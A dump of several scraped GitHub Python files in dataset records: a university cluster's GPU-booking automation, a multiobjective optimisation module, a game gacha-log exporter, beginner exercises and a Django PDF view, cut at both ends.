Error: {str(err)[:21]}'\n\n return logs\n\n # with oc.project(project_id), oc.timeout(10*60):\n # log.info(f\"✅ Found the project {oc.get_project_name()}, disabling GPU\")\n\n # Stop the GPU pod, and change GPU quota to 0\n # cmds = [\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/replicas\", \"value\": 0}]' -n \"\"\" + project_id,\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/template/spec/containers/0/resources\", \"value\": {}}]' -n \"\"\" + project_id,\n # \"\"\"oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 0}}}' -n \"\"\" + project_id\n # ]\n # for cmd in cmds:\n # # os.system(cmd)\n # # log.info(subprocess.run(cmd.split(' '), capture_output=True))\n # log.info(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT))\n\n # return f\"🛬✅ Successfully disabled GPU for {app_id} in {project_id}\"\n # except Exception as err:\n # return f\"🛬⚠️ Could not disable the GPU for {app_id} in {project_id}: {str(err)[:21]}\"\n\n\n\ndef enable_gpu(project_id, app_id, dyn_client):\n logs = ''\n email = ''\n try:\n dyn_quota = dyn_client.resources.get(api_version='v1', kind='ResourceQuota')\n body = {\n 'kind': 'ResourceQuota',\n 'apiVersion': 'v1',\n 'metadata': {'name': 'gpu-quota'},\n \"spec\": {\n \"hard\": { \"requests.nvidia.com/gpu\": 1 }\n }\n }\n dyn_quota.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU quota of *{project_id}* set to *1*\\n'\n email = email + f'The GPU was successfully enabled in your project {project_id}    '\n\n try:\n # Patch DeploymentConfig\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'template': {\n 'spec': {\n 'containers': [\n {\n \"name\": app_id,\n \"resources\": {\n \"requests\": {\"nvidia.com/gpu\": 1},\n \"limits\": {\"nvidia.com/gpu\": 1}\n }\n }\n ]\n }\n }\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU limits of *{app_id}* in *{project_id}* set to *1*'\n email = email + f'The GPU was successfully enabled for your workspace {app_id} in your project {project_id}. You can restart the workspace if needed, and start using the GPU.    '\n\n except Exception as err:\n # Error when editing DeploymentConfig\n logs = logs + f'⚠️ Could not change the GPU limits for *{app_id}* in *{project_id}*. Error: {str(err)[:21]}'\n email = email + f'The workspace provided {app_id} was not found in the project {project_id}, hence the GPU could not be enabled automatically. You will need to enable it by yourself.'\n\n except Exception as err:\n # Error when editing GPU quota\n logs = logs + f'❌ Could not set the GPU quota to 1 in *{project_id}*. Error: {str(err)[:21]}\\n'\n email = email + f'The project provided {project_id} was not found, hence the GPU could not be enabled. Contact the DSRI team on Slack or via DSRI-SUPPORT-L@maastrichtuniversity.nl    '\n\n return logs, email\n\n # with oc.project(project_id), oc.timeout(10*60):\n # log.info(f\"✅ Found the project {oc.get_project_name()}, enabling GPU\")\n # Change GPU quota to 1, and enable the GPU in the pod\n # cmds = [\n # \"\"\"oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 1}}}' -n \"\"\" + project_id,\n # \"\"\"oc patch dc/\"\"\" + app_id + \"\"\" --type=json -p='[{\"op\": \"replace\", \"path\": \"/spec/template/spec/containers/0/resources\", \"value\": {\"requests\": {\"nvidia.com/gpu\": 1}, \"limits\": {\"nvidia.com/gpu\": 1}}}]' -n \"\"\" + project_id,\n # ]\n # for cmd in cmds:\n # # os.system(cmd)\n # # log.info(subprocess.run(cmd.split(' '), capture_output=subprocess.PIPE).stdout.decode('utf-8'))\n # # log.info(subprocess.run(cmd.split(' '), capture_output=True))\n # log.info(subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT))\n\n # return f\"🚀✅ Successfully enabled GPU for {app_id} in {project_id}\"\n\n\ndef check_gpu_bookings() -> None:\n log.info(f'🔎 Checking GPU reservations to send booking notifications on the {datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")}')\n\n # Connect to the SQL DB\n engine = create_engine(settings.SQL_URL)\n SQLModel.metadata.create_all(engine)\n\n # Connect to the OpenShift cluster\n dyn_client, k8s_client, kubeConfig = oc_login()\n\n # Query the SQL DB to get the GPU reservations\n # And send msgs if reservations starts/ends\n with Session(engine) as session:\n statement = select(GpuBooking)\n results = session.exec(statement).all()\n\n for resa in results:\n try:\n resa = jsonable_encoder(resa)\n start_date = datetime.datetime.fromisoformat(resa['starting_date']).date()\n end_date = datetime.datetime.fromisoformat(resa['ending_date']).date()\n\n # Check GPU booking ending tomorrow (we stop it at end_date + 1)\n if end_date == datetime.date.today():\n email_msg = f\"\"\"⚠️ Your GPU booking in project {resa[\"project_id\"]} will end tomorrow at 9:00am!
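# A hedged, standalone sketch of the dynamic-client PATCH pattern that
# enable_gpu()/disable_gpu() above use: look a resource kind up by
# api_version/kind, then patch a partial body into a namespace. Assumes the
# `openshift` Python client and a reachable cluster via kubeconfig; the
# namespace name is hypothetical.
from kubernetes import config
from openshift.dynamic import DynamicClient

dyn_client = DynamicClient(config.new_client_from_config())
quota_api = dyn_client.resources.get(api_version="v1", kind="ResourceQuota")
quota_api.patch(
    body={
        "kind": "ResourceQuota",
        "apiVersion": "v1",
        "metadata": {"name": "gpu-quota"},
        "spec": {"hard": {"requests.nvidia.com/gpu": 1}},
    },
    namespace="example-project",  # hypothetical project/namespace
)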
    \nMake sure you have properly moved all data you want to keep in the persistent folder, as the pod will be restarted automatically.\n\"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking ending tomorrow\")\n\n\n # Check if GPU booking end date +1 day is today (since we switch in the morning, it prevents losing a day)\n if end_date + datetime.timedelta(days=1) == datetime.date.today():\n email_msg = f\"\"\"⚠️ Your GPU booking in project {resa[\"project_id\"]} just ended, and the access to the GPU in your project has been disabled    \"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking ended\")\n# slack_msg = f'📀 🛬 Booking ends: *GPU {resa[\"gpu_id\"]}* in project *{resa[\"project_id\"]}* for {resa[\"user_email\"]} on the {datetime.date.today()}\\n'\n# slack_msg = slack_msg + \"\"\"```\n# oc patch resourcequota/gpu-quota --patch '{\"spec\":{\"hard\": {\"requests.nvidia.com/gpu\": 0}}}' -n \"\"\" + resa['project_id'] + \"\"\"\n# ```\"\"\"\n slack_msg = disable_gpu(resa[\"project_id\"], resa[\"app_id\"], dyn_client)\n slack_msg = f\"\"\"🚀🔌 Disabling the GPU for {resa[\"user_email\"]} in *{resa[\"project_id\"]}* (from {start_date} to {end_date}):\\n\"\"\" + slack_msg\n post_msg_to_slack(slack_msg)\n\n\n # Check GPU booking starting\n if start_date == datetime.date.today():\n slack_msg, email_logs = enable_gpu(resa[\"project_id\"], resa[\"app_id\"], dyn_client)\n slack_msg = f\"\"\"🚀🔋 Enabling the GPU for {resa[\"user_email\"]} in *{resa[\"project_id\"]}* (from {start_date} to {end_date}):\\n\"\"\" + slack_msg\n email_msg = f\"\"\"✅ Your GPU booking in project {resa[\"project_id\"]} just started!    \n{email_logs}    \nFor more details, check out the documentation to see how to enable or use the GPU: https://dsri.maastrichtuniversity.nl/docs/deploy-on-gpu
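# A worked instance of the date check above: the quota is revoked on the
# morning after end_date, so "end_date + 1 day == today" holds exactly on
# the day the booking should be switched off.
import datetime

end_date = datetime.date.today() - datetime.timedelta(days=1)
assert end_date + datetime.timedelta(days=1) == datetime.date.today()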
    \nThe GPU will be automatically disabled at the end of your booking on the {end_date} at 9:00am\n\"\"\"\n send_email(email_msg, to=resa[\"user_email\"], subject=\"📀 DSRI GPU booking starting\")\n post_msg_to_slack(slack_msg)\n\n except Exception as err:\n log.error(err)\n\n\n\ndef backup_database() -> None:\n log.info(f'💾 Backing up the SQL database (export to CSV) on the {datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")}')\n\n # Connect to the SQL DB\n engine = create_engine(settings.SQL_URL)\n SQLModel.metadata.create_all(engine)\n DUMP_PATH = '/backup'\n\n with Session(engine) as session:\n date = datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n folder_path = f'{DUMP_PATH}/dsri-db_{date}'\n pathlib.Path(folder_path).mkdir(parents=True, exist_ok=True)\n\n # Dump GPU bookings\n outfile = open(f'{folder_path}/dsri-db_{date}_gpu-booking.csv', 'w')\n writer = csv.writer(outfile)\n statement = select(GpuBooking)\n results = session.exec(statement).all()\n [writer.writerow([getattr(curr, column.name) for column in GpuBooking.__mapper__.columns]) for curr in results]\n outfile.close()\n\n # Dump Users\n outfile = open(f'{folder_path}/dsri-db_{date}_users.csv', 'w')\n writer = csv.writer(outfile)\n statement = select(User)\n results = session.exec(statement).all()\n [writer.writerow([getattr(curr, column.name) for column in User.__mapper__.columns]) for curr in results]\n outfile.close()\n\n log.info(f'✅ Database backed up successfully on the {date}')\n\n\n\n# Just here as an example, but not really used in practice\n# pip install scholarly\n\n# def get_publications_about_dsri() -> None:\n# # will paginate to the next page by default\n# pubs = scholarly.search_pubs(\"This research was made possible, in part, using the Data Science Research Infrastructure (DSRI) hosted at Maastricht University\")\n# valid_pubs = []\n# limit = 20\n# for i, pub in enumerate(pubs):\n# if i >= limit:\n# break\n# if 'data science research infrastructure' in pub['bib']['abstract'].lower():\n# if 'dsri' in pub['bib']['abstract'].lower():\n# if 'maastricht university' in pub['bib']['abstract'].lower():\n# valid_pubs.append({\n# 'title': pub['bib']['title'],\n# 'authors': ', '.join(pub['bib']['author']),\n# 'pub_year': pub['bib']['pub_year'],\n# 'venue': pub['bib']['venue'],\n# 'abstract': pub['bib']['abstract'],\n# 'url': pub['pub_url'],\n# })\n# print(json.dumps(valid_pubs, indent=2))\n","repo_name":"MaastrichtU-IDS/dsri-documentation","sub_path":"server/api/automated_tasks.py","file_name":"automated_tasks.py","file_ext":"py","file_size_in_byte":13712,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"31160651011","text":"#!/usr/bin/env python\r\n\r\n\"\"\"Tchebycheff and weighted sum approaches for multiobjective optimization.\r\n\r\nauthor: jussiks\r\n\"\"\"\r\n\r\nfrom optimization import Problem, MOPSolution, WeightedSolution\r\nimport genetic_methods as gm\r\nimport numpy as np\r\nimport math\r\nfrom enum import Enum\r\nimport itertools\r\nimport random\r\nfrom typing import List\r\n\r\n\r\nclass Method(Enum):\r\n tchebycheff = 1\r\n weighted_sum = 2\r\n\r\n\r\ndef g_tchebycheff(solution: WeightedSolution, ref_point):\r\n \"\"\"Returns the value of objective function used in Tchebycheff approach.\r\n\r\n ref_point is the reference point, i.e. 
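# The CSV dump in backup_database() above reduces to this sketch: iterate a
# model's column names and write one row per object. The tiny stand-in class
# replaces the SQLModel table purely for illustration.
import csv
import io

class Row:  # stand-in for a mapped model
    def __init__(self, a, b):
        self.a, self.b = a, b

buf = io.StringIO()
writer = csv.writer(buf)
for obj in (Row(1, "x"), Row(2, "y")):
    writer.writerow([getattr(obj, c) for c in ("a", "b")])
assert buf.getvalue().splitlines() == ["1,x", "2,y"]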
the ideal objective vector.\r\n \"\"\"\r\n return max(solution.weights * abs(solution.evaluate() - ref_point))\r\n\r\n\r\ndef g_weighted_sum(solution: WeightedSolution):\r\n \"\"\"Returns the value of objective function used in Weighted Sum approach.\"\"\"\r\n return sum(solution.weights * solution.evaluate())\r\n\r\n\r\ndef fitness_eval(population: List[WeightedSolution], method: Method,\r\n ref_point=None):\r\n \"\"\"Calculates the fitness values for every member of the population.\r\n\r\n Arguments:\r\n population list of WeightedSolutions\r\n method either Method.tchebycheff or Method.weighted_sum\r\n ref_point reference point used in Tchebycheff method (numpy array)\r\n \"\"\"\r\n if method == Method.tchebycheff:\r\n if ref_point is None:\r\n raise ValueError(\"Reference point (ref_point) must be defined when using Tchebycheff approach.\")\r\n for p in population:\r\n p.fitness = g_tchebycheff(p, ref_point)\r\n elif method == Method.weighted_sum:\r\n for p in population:\r\n p.fitness = g_weighted_sum(p)\r\n else:\r\n raise ValueError(\"Method {0} not implemented.\".format(method))\r\n\r\n\r\ndef find_neighbours(population: List[WeightedSolution], count):\r\n \"\"\"Finds a given number of neighbours for each solution in population.\r\n\r\n Calculates nearests neighbours for each member of population using\r\n euclidean distace between weight vectors. Returns a dict where each key\r\n is an individual an value is a list of nearest neighbours of that\r\n individual.\r\n\r\n Arguments:\r\n population list of WeightedSolutions\r\n count how many neigbours to pick\r\n \"\"\"\r\n distances = {p: [] for p in population}\r\n for x, y in itertools.combinations(population, 2):\r\n dis = np.linalg.norm(x.variables - y.variables)\r\n distances[x].append({\"ind\": y, \"distance\": dis})\r\n distances[y].append({\"ind\": x, \"distance\": dis})\r\n # TODO add values in sorted order so we don't have to sort them\r\n # afterwards\r\n for key in distances:\r\n distances[key] = sorted(\r\n distances[key], key=lambda x: x[\"distance\"])[:count]\r\n return {\r\n key: [x[\"ind\"] for x in distances[key]] for key in distances\r\n }\r\n\r\n\r\ndef generate_next_gen(population: List[WeightedSolution], neighbour_count,\r\n method, ref_point=None, mutation_probability=0.01):\r\n \"\"\"Returns next generation of solutions\"\"\"\r\n\r\n # Find neigbours\r\n neighbour_dict = find_neighbours(population, neighbour_count)\r\n next_gen = []\r\n\r\n for solution in neighbour_dict:\r\n # Pick two random parents from neigbours\r\n x, y = random.sample(neighbour_dict[solution], 2)\r\n\r\n # Perform crossover, mutation and repair\r\n child_vars = gm.single_point_crossover(x, y)\r\n child = WeightedSolution(x.problem, child_vars, solution.weights)\r\n gm.gaussian_mutation(\r\n child, mutation_probability, [1] * len(child_vars))\r\n gm.repair(child)\r\n next_gen.append(child)\r\n return next_gen\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Objective function.\r\n func = lambda x: [\r\n sum(-10.0 * math.exp(-0.2 * math.sqrt(\r\n x[i]**2 + x[i + 1]**2)) for i in range(2)),\r\n sum(abs(x[i])**0.8 + 5 * math.sin(x[i]**3) for i in range(3))\r\n ]\r\n # Minimum and maximum values for input vectors\r\n constraints = [(-5, 5) for i in range(3)]\r\n problem = Problem(func, variable_bounds=constraints)\r\n var_generator = lambda: [\r\n random.uniform(low, high) for (low, high) in constraints]\r\n\r\n sol_count = 12\r\n\r\n # initial solutions\r\n solutions = [\r\n WeightedSolution(\r\n problem,\r\n var_generator(),\r\n [0 + i / 
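# A worked numeric instance of the two scalarisations defined above, with
# invented weights w, objective vector f(x) and reference point z*.
import numpy as np

w = np.array([0.5, 0.5])
fx = np.array([3.0, 1.0])
z_star = np.array([-20.0, -12.0])
assert max(w * abs(fx - z_star)) == 11.5  # Tchebycheff: max_i w_i |f_i(x) - z*_i|
assert sum(w * fx) == 2.0                 # weighted sum: sum_i w_i f_i(x)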
sol_count, 1 - i / sol_count])\r\n for i in range(sol_count)\r\n ]\r\n\r\n # Reference point used in Tchebycheff method\r\n z_star = np.array([-20, -12])\r\n\r\n # Number of neigbours picked in neigbour selection.\r\n neighbour_count = 4\r\n\r\n print(\"\\n{0} nearest neighbours for each individual using euclidean distance:\".format(\r\n neighbour_count))\r\n neighbour_dict = find_neighbours(solutions, neighbour_count)\r\n for solution in neighbour_dict:\r\n print(solution)\r\n for neighbour in neighbour_dict[solution]:\r\n print(\"\\t{0}\".format(neighbour))\r\n\r\n fitness_eval(solutions, Method.tchebycheff, ref_point=z_star)\r\n print(\"\\nTchebycheff function values for each individual:\")\r\n for s in solutions:\r\n print(\"{0}\\t{1}\".format(s, s.fitness))\r\n\r\n fitness_eval(solutions, Method.weighted_sum, ref_point=z_star)\r\n print(\"\\nWeighted sum function values for each individual:\")\r\n for s in solutions:\r\n print(\"{0}\\t{1}\".format(s, s.fitness))\r\n\r\n next_gen = generate_next_gen(\r\n solutions, neighbour_count, Method.tchebycheff, ref_point=z_star,\r\n mutation_probability=0.1)\r\n print(\"\\nNext generation using Tchebycheff:\")\r\n for s in next_gen:\r\n print(s)\r\n\r\n next_gen = generate_next_gen(\r\n solutions, neighbour_count, Method.weighted_sum,\r\n mutation_probability=0.1)\r\n print(\"\\nNext generation using weighted sums:\")\r\n for s in next_gen:\r\n print(s)\r\n","repo_name":"jussiks/optimization","sub_path":"optimization/moea_d.py","file_name":"moea_d.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"22191085421","text":"import json\nimport time\nimport requests\nfrom urllib import parse\nimport os\nimport re\nimport shutil\nfrom config import config, gachaTypeDict\nfrom time import sleep\nimport traceback\nfrom utils import logger\nfrom path import DataPath\n\n\nclass Genshan:\n def __init__(self, url, wishTypes) -> None:\n self.url = self.toApi(url)\n self.wishTypes = wishTypes\n\n def toApi(self, url):\n\n logger.debug(url)\n\n spliturl = str(url).split(\"?\")\n if \"webstatic-sea\" in spliturl[0] or \"hk4e-api-os\" in spliturl[0]:\n spliturl[\n 0\n ] = \"https://hk4e-api-os.mihoyo.com/event/gacha_info/api/getGachaLog\"\n else:\n spliturl[0] = \"https://hk4e-api.mihoyo.com/event/gacha_info/api/getGachaLog\"\n url = \"?\".join(spliturl)\n return url\n\n def checkApi(self):\n if \"?\" not in self.url:\n logger.error(\"invalid url\")\n return False\n\n try:\n r = requests.get(self.url)\n s = r.content.decode(\"utf-8\")\n j = json.loads(s)\n except Exception:\n logger.error(traceback.format_exc())\n return False\n\n logger.debug(j)\n\n if not j[\"data\"]:\n logger.warning(j[\"message\"])\n return False\n return True\n\n def getApi(self, gachaType, size, page, end_id=\"\"):\n parsed = parse.urlparse(self.url)\n querys = parse.parse_qsl(str(parsed.query))\n param_dict = dict(querys)\n param_dict[\"size\"] = size\n param_dict[\"gacha_type\"] = gachaType\n param_dict[\"page\"] = page\n param_dict[\"lang\"] = \"zh-cn\"\n param_dict[\"end_id\"] = end_id\n param = parse.urlencode(param_dict)\n path = str(self.url).split(\"?\")[0]\n api = path + \"?\" + param\n return api\n\n def getGachaLogs(self, gachaTypeId):\n # api 限制一页最大 20\n size = \"20\"\n gachaList = []\n end_id = \"0\"\n for page in range(1, 9999):\n\n logger.info(f\"getting: {gachaTypeDict[gachaTypeId]}, page: {page}\")\n\n api = self.getApi(gachaTypeId, size, page, end_id)\n r = 
requests.get(api)\n s = r.content.decode(\"utf-8\")\n j = json.loads(s)\n gacha = j[\"data\"][\"list\"]\n if not len(gacha):\n break\n for i in gacha:\n gachaList.append(i)\n end_id = j[\"data\"][\"list\"][-1][\"id\"]\n sleep(0.5)\n\n return gachaList\n\n def mergeData(self, localData, gachaData):\n for type in gachaTypeDict:\n localGachaLog = []\n thisGachaLog = []\n try:\n localGachaLog = localData[\"gachaLog\"][type]\n thisGachaLog = gachaData[\"gachaLog\"][type]\n except:\n pass\n if thisGachaLog == localGachaLog:\n pass\n else:\n flag = [1] * len(thisGachaLog)\n loc = [[i[\"time\"], i[\"name\"]] for i in localGachaLog]\n for i in range(len(thisGachaLog)):\n gachaGet = thisGachaLog[i]\n get = [gachaGet[\"time\"], gachaGet[\"name\"]]\n if get in loc:\n pass\n else:\n flag[i] = 0\n\n tempData = []\n for i in range(len(thisGachaLog)):\n if flag[i] == 0:\n gachaGet = thisGachaLog[i]\n tempData.insert(0, gachaGet)\n logger.info(\n \"merge {} added: {}\".format(gachaTypeDict[type], len(tempData))\n )\n for i in tempData:\n localData[\"gachaLog\"][type].insert(0, i)\n\n return localData\n\n def load(self):\n if not self.checkApi():\n return\n\n self.startTime = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\n\n gachaData = {}\n gachaData[\"gachaLog\"] = {}\n for gachaTypeId in self.wishTypes:\n gachaLog = self.getGachaLogs(gachaTypeId)\n gachaData[\"gachaLog\"][gachaTypeId] = gachaLog\n\n uid_flag = 1\n for gachaType in gachaData[\"gachaLog\"]:\n for log in gachaData[\"gachaLog\"][gachaType]:\n if uid_flag and log[\"uid\"]:\n gachaData[\"uid\"] = log[\"uid\"]\n uid_flag = 0\n\n self.uid = gachaData[\"uid\"]\n localDataFilePath = os.path.join(DataPath, f\"gachaData-{self.uid}.json\")\n\n if os.path.isfile(localDataFilePath):\n with open(localDataFilePath, \"r\", encoding=\"utf-8\") as f:\n localData = json.load(f)\n self.data = self.mergeData(localData, gachaData)\n else:\n self.data = gachaData\n\n self.data[\"gachaType\"] = gachaTypeDict\n\n def save(self):\n # 抽卡报告读取 gachaData.json\n # with open(os.path.join(DataPath, \"gachaData.json\"), \"w\", encoding=\"utf-8\") as f:\n # json.dump(mergeData, f, ensure_ascii=False, sort_keys=False, indent=4)\n # 待合并数据 gachaData-{uid}.json\n with open(\n os.path.join(DataPath, f\"gachaData-{self.uid}.json\"), \"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(self.data, f, ensure_ascii=False, sort_keys=False, indent=4)\n # 备份历史数据 gachaData-{uid}-{self.startTime}.json\n with open(\n os.path.join(DataPath, f\"gachaData-{self.uid}-{self.startTime}.json\"),\n \"w\",\n encoding=\"utf-8\",\n ) as f:\n json.dump(self.data, f, ensure_ascii=False, sort_keys=False, indent=4)\n\n if config.getKey(\"auto_archive\"):\n logger.info(\"archive files\")\n archive_path = os.path.join(DataPath, \"archive\")\n if not os.path.exists(archive_path):\n os.mkdir(archive_path)\n\n logger.debug(\"archive path: {}\".format(archive_path))\n\n files = os.listdir(DataPath)\n archive_UIGF = [\n f for f in files if re.match(r\"UIGF_gachaData-\\d+-\\d+.json\", f)\n ]\n archive_json = [f for f in files if re.match(r\"gachaData-\\d+-\\d+.json\", f)]\n archive_xlsx = [\n f for f in files if re.match(r\"gachaExport-\\d+-\\d+.xlsx\", f)\n ]\n archive_files = archive_UIGF + archive_json + archive_xlsx\n\n logger.debug(\"files: {}\".format(archive_files))\n\n for file in archive_files:\n try:\n shutil.move(os.path.join(DataPath, file), archive_path)\n logger.info(\"done: {}\".format(file))\n except Exception:\n logger.error(\"failed: {}\".format(file))\n logger.debug(traceback.format_exc())\n 
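# The cursor pagination in getGachaLogs() above reduces to this standalone
# sketch: request a page, feed the last record's id back as end_id, stop on
# an empty page. The response shape mirrors the code above; the endpoint
# itself is a placeholder, not the real API.
import requests

def fetch_all(base_url, page_size=20):
    records, end_id, page = [], "0", 1
    while True:
        r = requests.get(base_url, params={"size": page_size, "page": page, "end_id": end_id})
        batch = r.json()["data"]["list"]
        if not batch:
            break
        records.extend(batch)
        end_id = batch[-1]["id"]
        page += 1
    return records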
try:\n os.remove(os.path.join(archive_path, file))\n except:\n pass\n\n def export(self):\n if config.getKey(\"export_uigf_json\"):\n import export_uigf\n\n export_uigf.write(self.uid, self.data, self.startTime)\n\n if config.getKey(\"export_xlsx\"):\n import export_xlsx\n\n export_xlsx.write(self.uid, self.data, self.startTime)\n\n if config.getKey(\"export_html\"):\n import export_html\n\n export_html.write(self.uid, self.data)\n\n def main(self):\n logger.info(\"start\")\n self.load()\n self.save()\n self.export()\n\n\nif __name__ == \"__main__\":\n gs = Genshan(config.getKey(\"url\"), config.getKey(\"wish_types\"))\n\n gs.main()\n","repo_name":"ipuppet/genshin-gacha-export","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28132526081","text":"\"\"\" numero1=20\nnumero2=10\nif numero1 == 10 and numero2 == 10:\n print('Ambos valores son iguales')\nelse:\n print('Ambos valores no son iguales')\n \"\"\"\n\n\"\"\" numero1=10\nnumero2=10\nif numero1 == 10 or numero2 == 10:\n print('Al menos un valor es 10')\nelse:\n print('Ningun valor es 10') \"\"\"\n\nvalor1=True\nvalor2=not True\n\nprint(valor1, valor2)","repo_name":"YOYO-DR/Python","sub_path":"Curso de Python - INFORMATICONFIG/9_OperadoresAndOrNot.py","file_name":"9_OperadoresAndOrNot.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20400390004","text":"s = cont= 0\nmaior = menor = 0\nbarato = ' '\nwhile True:\n print('-+='*20,'')\n print(' MEGA SUPERMERCADO ')\n print('-+='*20,'')\n produto = str(input('Nome do Produto: '))\n preco = float(input('Preço: R$ '))\n print('-+='*20,'')\n \n if preco > 1000: # Se o produto é mais de 1000\n cont +=1\n\n if cont == 1: #primeiro preço\n maior = preco\n menor = preco\n barato = produto\n\n else:\n if preco > maior: # maior preço\n maior = preco\n if preco < menor: # menor preço\n menor = preco\n barato = produto\n\n resp = ' '\n s += preco # somando os preços dos produtos\n while resp not in 'SN':\n resp = str(input('Quer continuar? 
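# The archive selection in save() above keys on re.match with patterns like
# these; a standalone instance with invented file names:
import re

files = ["UIGF_gachaData-123-20230101.json", "notes.txt", "gachaExport-123-20230101.xlsx"]
kept = [f for f in files
        if re.match(r"UIGF_gachaData-\d+-\d+.json", f) or re.match(r"gachaExport-\d+-\d+.xlsx", f)]
assert kept == ["UIGF_gachaData-123-20230101.json", "gachaExport-123-20230101.xlsx"]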
[S/N] | ')).strip().upper()[0]\n if resp == 'N':\n break\n \nprint('-+='*20,'')\nprint(f'O Total da compra foi R$ {s:.2f}')\nprint(f'Temos {cont} produtos custando mais de R$1000.00')\nprint(f'O produto mais barato foi {barato} que custa R${menor}')\nprint(f'O produto mais caro foi R${maior} ')\nprint('-+='*20,'')\n","repo_name":"jailsonjhonatas/Desafios-Python","sub_path":"estatistica_em_produtos.py","file_name":"estatistica_em_produtos.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43296446049","text":"# โปรแกรมแลกธนบัตร\r\n# แลกเงินและหาจำนวนของแบงค์\r\n\r\n# 2000 => 1000 => สองใบ\r\n# 1500 => 1000 => หนึ่งใบ, 500 => หนึ่งใบ\r\n\r\nNumber = int(input('ป้อนจำนวนเงินของคุณ :'))\r\n\r\nif Number >= 1000:\r\n print('1000 บาท',Number//1000,'ใบ')\r\n Number = Number % 1000 # 1500 % 1000 หารเอาเศษ = 500\r\nif Number >=500:\r\n print('500บาท',Number//500,'ใบ') # % = หารเอาเศษ\r\n Number = Number % 500\r\nif Number >= 100:\r\n print('100 บาท',Number//100,'ใบ')\r\n Number = Number % 100\r\nif Number >= 50:\r\n print('50 บาท',Number//50,'ใบ')\r\n Number = Number % 50\r\nif Number >= 20:\r\n print('20 บาท',Number//20,'ใบ')\r\n Number = Number % 20\r\n","repo_name":"JengJeng7/Python_code_Basic","sub_path":"EP.22 โปรแกรมแยกธนบัตร.py","file_name":"EP.22 โปรแกรมแยกธนบัตร.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27525764296","text":"from django.shortcuts import render, redirect, HttpResponse\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom eventos.models import evento\nfrom gastos.models import gasto\nfrom django.contrib.auth.decorators import login_required\nfrom decimal import Decimal \nimport re\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nfrom reportlab.lib.pagesizes import landscape\nfrom reportlab.lib import colors\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.platypus.tables import Table, TableStyle\nfrom django.utils import timezone\n\n\n\n\n\n\n#-----------------------------APARTADO DE MODULO DE EVENTOS---------------------------------------------\n#----------------------------------------------------------------------------------------------------------------------\n\n\n@login_required(login_url=\"auth/login/\")\ndef generar_pdf_gasto(request, gasto_id):\n try:\n gasto_seleccionado = gasto.objects.get(pk=gasto_id)\n except gasto.DoesNotExist:\n return HttpResponse('El gasto no existe')\n\n response = HttpResponse(content_type='application/pdf')\n response['Content-Disposition'] = f'attachment; filename=\"gasto_{gasto_seleccionado.id}.pdf'\n\n doc = SimpleDocTemplate(response, pagesize=landscape(letter))\n\n styles = getSampleStyleSheet()\n style_title = styles['Title']\n style_body = styles['Normal']\n\n elements = []\n\n fecha_actual = timezone.now().strftime(\"%Y-%m-%d\")\n\n\n elements.append(Paragraph('COMUNIDAD ISLÁMICA ALDAAWA', style_title))\n elements.append(Paragraph('Gastos', style_title))\n elements.append(Spacer(1, 12))\n\n content = [\n [Paragraph('Evento:', style_body), gasto_seleccionado.eventoa.titulo],\n [Paragraph('Presupuesto:', style_body), f'Q. {gasto_seleccionado.presupuesto} °°'],\n [Paragraph('Transporte:', style_body), f'Q. 
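# The Thai note-changing record above applies the classic greedy algorithm
# with // and %; divmod() expresses each step in one call. Worked for an
# invented amount of 1570 baht:
amount = 1570
for note in (1000, 500, 100, 50, 20):
    count, amount = divmod(amount, note)
    if count:
        print(f"{note} baht x {count}")  # prints 1000 x 1, 500 x 1, 50 x 1, 20 x 1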
